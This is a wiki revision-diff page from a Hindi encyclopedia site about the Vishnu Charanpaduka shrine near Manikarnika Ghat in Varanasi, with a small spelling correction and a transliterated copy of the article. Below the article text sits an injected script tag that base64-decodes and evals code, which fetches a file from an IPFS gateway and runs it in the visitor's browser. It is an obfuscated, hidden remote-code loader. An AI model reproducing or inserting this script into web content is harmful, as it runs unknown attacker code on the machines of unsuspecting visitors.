Difference between revisions of "विष्‍णु चरणपादुका वाराणसी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "मणिकार्णिका घाट" to "मणिकर्णिका घाट")
 
Line 1: Line 1:
 
[[चित्र:Charan-Paduka-Varanasi.jpg|thumb|250px|विष्‍णु चरणपादुका, [[वाराणसी]]]]
 
[[चित्र:Charan-Paduka-Varanasi.jpg|thumb|250px|विष्‍णु चरणपादुका, [[वाराणसी]]]]
'''विष्‍णु चरणपादुका''' [[वाराणसी]] शहर में [[मणिकार्णिका घाट वाराणसी|मणिकार्णिका घाट]] के समीप है।  
+
'''विष्‍णु चरणपादुका''' [[वाराणसी]] शहर में [[मणिकर्णिका घाट वाराणसी|मणिकर्णिका घाट]] के समीप है।  
 
*इसे संगमरमर से चिह्नित किया गया है। इसे [[काशी]] का पवित्रतम स्‍थान कहा जाता है।  
 
*इसे संगमरमर से चिह्नित किया गया है। इसे [[काशी]] का पवित्रतम स्‍थान कहा जाता है।  
 
*[[अनुश्रुति]] है कि भगवान [[विष्णु]] ने यहाँ ध्‍यान लगाया था। इसी के समीप मणिकार्णिका कुण्‍ड है।  
 
*[[अनुश्रुति]] है कि भगवान [[विष्णु]] ने यहाँ ध्‍यान लगाया था। इसी के समीप मणिकार्णिका कुण्‍ड है।  

Latest revision as of 10:13, 2 November 2016

[[chitr:Charan-Paduka-Varanasi.jpg|thumb|250px|vishh‍nu charanapaduka, varanasi]] vishh‍nu charanapaduka varanasi shahar mean manikarnika ghat ke samip hai.

  • ise sangamaramar se chihnit kiya gaya hai. ise kashi ka pavitratam sh‍than kaha jata hai.
  • anushruti hai ki bhagavan vishnu ne yahaan dhh‍yan lagaya tha. isi ke samip manikarnika kunh‍d hai.
  • mana jata hai ki bhagavan shiv ka mani tatha devi parvati ka karnaphool is kunh‍d mean gira tha.
  • chakrapushh‍kararni ek chaukor kunh‍d hai. isake charoan or lohe ki reliang bani huee hai.
  • ise vishh‍v ka pahala kunh‍d mana jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh